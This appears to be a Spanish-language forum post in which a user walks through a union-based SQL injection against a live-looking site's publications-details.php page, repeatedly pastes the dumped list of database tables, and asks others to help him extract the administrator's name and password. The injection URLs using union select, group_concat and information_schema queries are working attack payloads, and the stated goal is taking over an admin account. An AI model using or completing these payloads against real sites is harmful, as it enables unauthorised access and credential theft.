Citar
CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_
SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,
INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS
,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application
,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events,
expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories,
kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session,
kfm_session_vars,kfm_tagged_files,
kfm_tags,links,member_directory,member_list,members,members_hp,news,photos,
photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports,
publications,publications_cat,publications_hp,reach,reach_cat,rexpan,
science,scienceContent,sciencecat,scienceinfo,video,vision
3
SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,
INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS
,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application
,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events,
expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories,
kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session,
kfm_session_vars,kfm_tagged_files,
kfm_tags,links,member_directory,member_list,members,members_hp,news,photos,
photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports,
publications,publications_cat,publications_hp,reach,reach_cat,rexpan,
science,scienceContent,sciencecat,scienceinfo,video,vision
3
Resultado Tabla 3
Citar
2
CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_
SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,
INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS
,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application
,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events,
expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories,
kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session,
kfm_session_vars,kfm_tagged_files,
kfm_tags,links,member_directory,member_list,members,members_hp,news,photos,
photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports,
publications,publications_cat,publications_hp,reach,reach_cat,rexpan,
science,scienceContent,sciencecat,scienceinfo,video,vision
CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_
SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,
INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS
,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application
,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events,
expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories,
kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session,
kfm_session_vars,kfm_tagged_files,
kfm_tags,links,member_directory,member_list,members,members_hp,news,photos,
photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports,
publications,publications_cat,publications_hp,reach,reach_cat,rexpan,
science,scienceContent,sciencecat,scienceinfo,video,vision
Y en las dos realizo el mismo código y en la 2 me aparace un (3) y en la 3 me aparace un (2)
Pude ser que no haya descifrado el administrador bien?
* Es muy cantoso ver el administrador, para ponerlo a prueba intenten saber cual es.
- Se que estoy al último paso de hacerlo, pero me quedado estancado.
Os pondré paso a paso mi ataque para ver si he cometido algún error en el proceso.
Paso 1:
Me dirigo al navegador (En este caso Firefox) - Espero que esto no influya en el ataque.
Paso 2:
Escribo la url de mi web y le inyecto un código para averiguar las tablas.
www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,-- (Voy agregando números de menor a mayor consecutivamente hasta que me sale la página de tablas) en este caso llegé hasta el 12.
Citar
Y en la pantalla me muestra un 2 (Marcado en azul) y un 3 separado por un ("Intro")Paso 3:
Con esta información pruebo a inyectarle de nuevo otro código agregandole lo siguiente:
Citar
www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables
Dandome la pantalla como resultado el siguiente contenido:
Citar
CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB_IO_PATTERN,INNODB_RSEG,ProcessSettings,about,admincms,application,banner,banner2,brochure,careerHP,careers,categories,committees,contact,events,expert,expert_content,hp_feature,ifra,join_rifm,kfm_directories,kfm_files,kfm_files_images,kfm_files_images_thumbs,kfm_parameters,kfm_session,kfm_session_vars,kfm_tagged_files,kfm_tags,links,member_directory,member_list,members,members_hp,news,photos,photos_cat,posters,press,presskit,pub_brochures,pub_feature,pub_reports,publications,publications_cat,publications_hp,reach,reach_cat,rexpan,science,scienceContent,sciencecat,scienceinfo,video,vision
3
3
Paso 4:
Busco el nombre de adminitrador, y en caso de no saberlo busco algo referente a admi, admin, ect.... Para saber a cuál corresponde o tener una cierta referencia.
Paso 5:
Una vez tengamos el nombre me dirigo a una web donde te permita convertir cualquier palabra a ASCCI (Puede que aqui resida el fallo pues no se si se debe pasar exactamente a ASCII o a Hexadecimal) Yo me arriesgé con ASCII que es la que creo que sería. Dandome el siguiente resultado:
Citar
117 110 100 101 102 105 110 101 100
Paso 6:
Le quito todos los espacios al resultado ASCII y lo sustituyo por una coma. Quedando tal así:
Citar
117,110,100,101,102,105,110,101,100
Paso 7:
Teniendo estos resultados vuelvo a inyectar otro código más sustituyendo en el group_concat(table_name) por group_concat(column_name) y sustituyendo _schema.table por _schema.columns agregando ademas el siguiente código:
Citar
www.xxxxxxx.com/publications-details.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+
where+table_name=char (117,110,100,101,102,105,110,101,100)
where+table_name=char (117,110,100,101,102,105,110,101,100)
Y aquí cuando imagino que te debería dar los resultados que buscamos (Es decir los privilegios de nombre de administrador y su contraseña)
Viendo que no era así probé a realizar el mismo proceso sustituyendo la tabla 2 por la 3
Y obtengo el mismo resultado.
Asi que estaré haciendo algún paso mal. Por eso he puesto paso por paso una pequeña guía de mi proceso. Haber si alguien pudiera ver mi tropiezo.
Gracias por vuestra ayuda y orientación.
Un cordial saludo
Atentamente
WiseHidden